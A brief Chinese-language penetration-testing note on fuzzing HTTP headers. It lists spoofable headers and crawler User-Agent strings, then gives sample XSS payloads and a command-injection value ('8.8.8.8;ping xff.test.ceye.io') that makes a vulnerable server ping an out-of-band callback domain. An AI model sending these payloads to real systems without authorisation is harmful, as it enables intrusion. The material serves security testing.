正文
https://chrome.google.com/webstore/detail/smart-header/ncgnmldbedmbadafajhjeahmafdmggbp?hl=zh-CN
fuzzing HTTP 头可能导致的漏洞包括(但不限于) XSS, SQLi (Blind) 以及命令执行(RCE)。
值得注意的一些HTTP请求头
1 2 3 4
| User-Agent Accept-Language X-Forwarded-Forwarded-For X-Real-IP
|
常用配置项
User-Agent
UA
1 2 3 4 5 6 7 8 9 10 11 12
| # PC 百度蜘蛛 Mozilla/5.0 (compatible; Baiduspider/2.0; +http: # Mobile 百度蜘蛛 Mozilla/5.0 (Linux;u;Android 4.2.2;zh-cn;) AppleWebKit/534.46 (KHTML,like Gecko) Version/5.1 Mobile Safari/10600.6.3 (compatible; Baiduspider/2.0; +http: # Google Mozilla/5.0 (compatible; Googlebot/2.1; +http: # IE 6 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.6.01001) # iPhone6 Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1 # Samsung Galaxy S4 Mozilla/5.0 (Linux; Android 4.2.2; GT-I9505 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.59 Mobile Safari/537.36
|
举个例子
1 2 3 4 5
| User-Agent: <script>alert(1)</script> X-Forwarded-For: <script>alert(1)</script> X-Real-IP: <script>alert(1)</script> X-Forwarded-For: 8.8.8.8;ping xff.test.ceye.io X-Real-IP: 8.8.8.8;ping xff.test.ceye.io
|